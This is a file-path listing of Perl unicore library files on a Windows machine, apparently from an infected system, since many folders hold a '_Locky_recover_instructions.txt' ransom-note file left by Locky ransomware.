c:\Perl\perl\lib\unicore\lib\Blk\Sundanes.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Superscr.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Supplem2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Supplem3.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Supplem4.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Supplem5.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Supplem6.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Suppleme.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\SylotiNa.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Syriac.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Tagalog.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Tagbanwa.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Tags.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\TaiLe.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\TaiTham.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\TaiViet.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\TaiXuanJ.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Tamil.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Telugu.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Thaana.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Thai.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Tibetan.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Tifinagh.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Ugaritic.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\UnifiedC.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Vai.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Variati2.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Variatio.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\VedicExt.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\Vertical.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\YijingHe.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\YiRadica.pl<br />
c:\Perl\perl\lib\unicore\lib\Blk\YiSyllab.pl<br />
c:\Perl\perl\lib\unicore\lib\Cased\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Cased\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Cased\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\10.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Ccc\103.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\107.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\11.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\118.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\12.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\122.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\129.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\13.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\130.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\132.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\14.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\15.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\16.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\17.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\18.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\19.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\20.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\21.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\22.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\23.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\24.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\25.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\26.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\27.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\28.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\29.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\30.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\31.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\32.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\33.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\34.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\35.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\36.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\84.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\91.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\A.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\AL.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\AR.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\ATA.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\ATAR.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\ATB.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\ATBL.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\B.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\BL.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\BR.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\DA.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\DB.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\IS.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\KV.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\L.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\NK.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\NR.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\OV.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\R.pl<br />
c:\Perl\perl\lib\unicore\lib\Ccc\VR.pl<br />
c:\Perl\perl\lib\unicore\lib\CE\N.pl<br />
c:\Perl\perl\lib\unicore\lib\CE\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\CE\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\CI\N.pl<br />
c:\Perl\perl\lib\unicore\lib\CI\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\CI\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\CompEx\N.pl<br />
c:\Perl\perl\lib\unicore\lib\CompEx\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\CompEx\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\CWCF\N.pl<br />
c:\Perl\perl\lib\unicore\lib\CWCF\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\CWCF\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\CWCM\N.pl<br />
c:\Perl\perl\lib\unicore\lib\CWCM\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\CWCM\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\CWKCF\N.pl<br />
c:\Perl\perl\lib\unicore\lib\CWKCF\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\CWKCF\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\CWL\N.pl<br />
c:\Perl\perl\lib\unicore\lib\CWL\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\CWL\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\CWT\N.pl<br />
c:\Perl\perl\lib\unicore\lib\CWT\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\CWT\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\CWU\N.pl<br />
c:\Perl\perl\lib\unicore\lib\CWU\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\CWU\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Dash\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Dash\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Dash\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Dep\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Dep\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Dep\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\DI\N.pl<br />
c:\Perl\perl\lib\unicore\lib\DI\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\DI\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Dia\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Dia\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Dia\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Com.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Dt\Enc.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Fin.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Font.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Fra.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Init.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Iso.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Med.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Nar.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Nb.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\NonCanon.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\None.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Sml.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Sqr.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Sub.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Sup.pl<br />
c:\Perl\perl\lib\unicore\lib\Dt\Vert.pl<br />
c:\Perl\perl\lib\unicore\lib\Ea\A.pl<br />
c:\Perl\perl\lib\unicore\lib\Ea\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Ea\F.pl<br />
c:\Perl\perl\lib\unicore\lib\Ea\H.pl<br />
c:\Perl\perl\lib\unicore\lib\Ea\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Ea\Na.pl<br />
c:\Perl\perl\lib\unicore\lib\Ea\W.pl<br />
c:\Perl\perl\lib\unicore\lib\Ext\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Ext\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Ext\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\C.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Gc\Cc.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Cf.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Cn.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Co.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Cs.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\L.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\LC.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Ll.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Lm.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Lo.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Lt.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Lu.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\M.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Mc.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Me.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Mn.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Nl.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\No.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\P.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Pd.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Pe.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Pf.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Pi.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Po.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Ps.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\S.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Sc.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Sk.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Sm.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\So.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Z.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Zl.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Zp.pl<br />
c:\Perl\perl\lib\unicore\lib\Gc\Zs.pl<br />
c:\Perl\perl\lib\unicore\lib\GCB\CN.pl<br />
c:\Perl\perl\lib\unicore\lib\GCB\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\GCB\CR.pl<br />
c:\Perl\perl\lib\unicore\lib\GCB\EX.pl<br />
c:\Perl\perl\lib\unicore\lib\GCB\L.pl<br />
c:\Perl\perl\lib\unicore\lib\GCB\LF.pl<br />
c:\Perl\perl\lib\unicore\lib\GCB\LV.pl<br />
c:\Perl\perl\lib\unicore\lib\GCB\LVT.pl<br />
c:\Perl\perl\lib\unicore\lib\GCB\PP.pl<br />
c:\Perl\perl\lib\unicore\lib\GCB\SM.pl<br />
c:\Perl\perl\lib\unicore\lib\GCB\T.pl<br />
c:\Perl\perl\lib\unicore\lib\GCB\V.pl<br />
c:\Perl\perl\lib\unicore\lib\GCB\XX.pl<br />
c:\Perl\perl\lib\unicore\lib\GrBase\N.pl<br />
c:\Perl\perl\lib\unicore\lib\GrBase\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\GrBase\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\GrExt\N.pl<br />
c:\Perl\perl\lib\unicore\lib\GrExt\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\GrExt\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Hex\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Hex\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Hex\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Hst\NA.pl<br />
c:\Perl\perl\lib\unicore\lib\Hst\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Hyphen\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Hyphen\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Hyphen\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\IDC\N.pl<br />
c:\Perl\perl\lib\unicore\lib\IDC\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\IDC\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Ideo\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Ideo\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Ideo\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\IDS\N.pl<br />
c:\Perl\perl\lib\unicore\lib\IDS\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\IDS\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\IDSB\N.pl<br />
c:\Perl\perl\lib\unicore\lib\IDSB\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\IDSB\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\IDST\N.pl<br />
c:\Perl\perl\lib\unicore\lib\IDST\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\IDST\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\In\2_0.pl<br />
c:\Perl\perl\lib\unicore\lib\In\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\In\2_1.pl<br />
c:\Perl\perl\lib\unicore\lib\In\3_0.pl<br />
c:\Perl\perl\lib\unicore\lib\In\3_1.pl<br />
c:\Perl\perl\lib\unicore\lib\In\3_2.pl<br />
c:\Perl\perl\lib\unicore\lib\In\4_0.pl<br />
c:\Perl\perl\lib\unicore\lib\In\4_1.pl<br />
c:\Perl\perl\lib\unicore\lib\In\5_0.pl<br />
c:\Perl\perl\lib\unicore\lib\In\5_1.pl<br />
c:\Perl\perl\lib\unicore\lib\In\5_2.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Ain.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Jg\Alaph.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Alef.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Beh.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Beth.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Burushas.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Dal.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\DalathRi.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\E.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\FarsiYeh.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Fe.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Feh.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\FinalSem.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Gaf.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Gamal.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Hah.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\HamzaOnH.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\He.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Heh.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\HehGoal.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Heth.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Kaf.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Kaph.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Khaph.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\KnottedH.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Lam.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Lamadh.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Meem.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Mim.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\NoJoinin.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Noon.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Nun.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Nya.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Pe.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Qaf.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Qaph.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Reh.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Reversed.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Sad.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Sadhe.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Seen.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Semkath.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Shin.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\SwashKaf.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\SyriacWa.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Tah.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Taw.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\TehMarbu.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Teth.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Waw.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Yeh.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\YehBarre.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\YehWithT.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Yudh.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\YudhHe.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Zain.pl<br />
c:\Perl\perl\lib\unicore\lib\Jg\Zhain.pl<br />
c:\Perl\perl\lib\unicore\lib\JoinC\N.pl<br />
c:\Perl\perl\lib\unicore\lib\JoinC\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\JoinC\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Jt\C.pl<br />
c:\Perl\perl\lib\unicore\lib\Jt\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Jt\D.pl<br />
c:\Perl\perl\lib\unicore\lib\Jt\R.pl<br />
c:\Perl\perl\lib\unicore\lib\Jt\T.pl<br />
c:\Perl\perl\lib\unicore\lib\Jt\U.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\AI.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Lb\AL.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\B2.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\BA.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\BB.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\BK.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\CB.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\CL.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\CM.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\CP.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\EX.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\GL.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\HY.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\ID.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\IN.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\IS.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\NL.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\NS.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\NU.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\OP.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\PO.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\PR.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\QU.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\SA.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\SG.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\SP.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\SY.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\WJ.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\XX.pl<br />
c:\Perl\perl\lib\unicore\lib\Lb\ZW.pl<br />
c:\Perl\perl\lib\unicore\lib\LOE\N.pl<br />
c:\Perl\perl\lib\unicore\lib\LOE\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Lower\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Lower\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Lower\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\Math\N.pl<br />
c:\Perl\perl\lib\unicore\lib\Math\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Math\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\NChar\N.pl<br />
c:\Perl\perl\lib\unicore\lib\NChar\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\NChar\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\NFCQC\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\NFCQC\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\NFDQC\N.pl<br />
c:\Perl\perl\lib\unicore\lib\NFDQC\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\NFDQC\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\NFKCQC\M.pl<br />
c:\Perl\perl\lib\unicore\lib\NFKCQC\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\NFKCQC\N.pl<br />
c:\Perl\perl\lib\unicore\lib\NFKCQC\Y.pl<br />
c:\Perl\perl\lib\unicore\lib\NFKDQC\N.pl<br />
c:\Perl\perl\lib\unicore\lib\NFKDQC\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Nt\De.pl<br />
c:\Perl\perl\lib\unicore\lib\Nt\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Nt\Di.pl<br />
c:\Perl\perl\lib\unicore\lib\Nt\Nu.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\0.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\unicore\lib\Nv\1.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\10.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\100.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\1000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\10000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\100000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\10000000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\10000002.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\11.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\11_2.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\12.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\13.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\13_2.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\14.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\15.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\15_2.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\16.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\17.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\17_2.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\18.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\19.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\1_10.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\1_16.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\1_2.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\1_3.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\1_4.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\1_5.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\1_6.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\1_7.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\1_8.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\1_9.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\2.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\20.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\200.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\2000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\20000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\21.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\22.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\23.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\24.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\25.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\26.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\27.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\28.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\29.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\2_3.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\2_5.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\3.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\30.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\300.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\3000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\30000.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\31.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\32.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\33.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\34.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\35.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\36.pl<br />
c:\Perl\perl\lib\unicore\lib\Nv\37.pl<br />
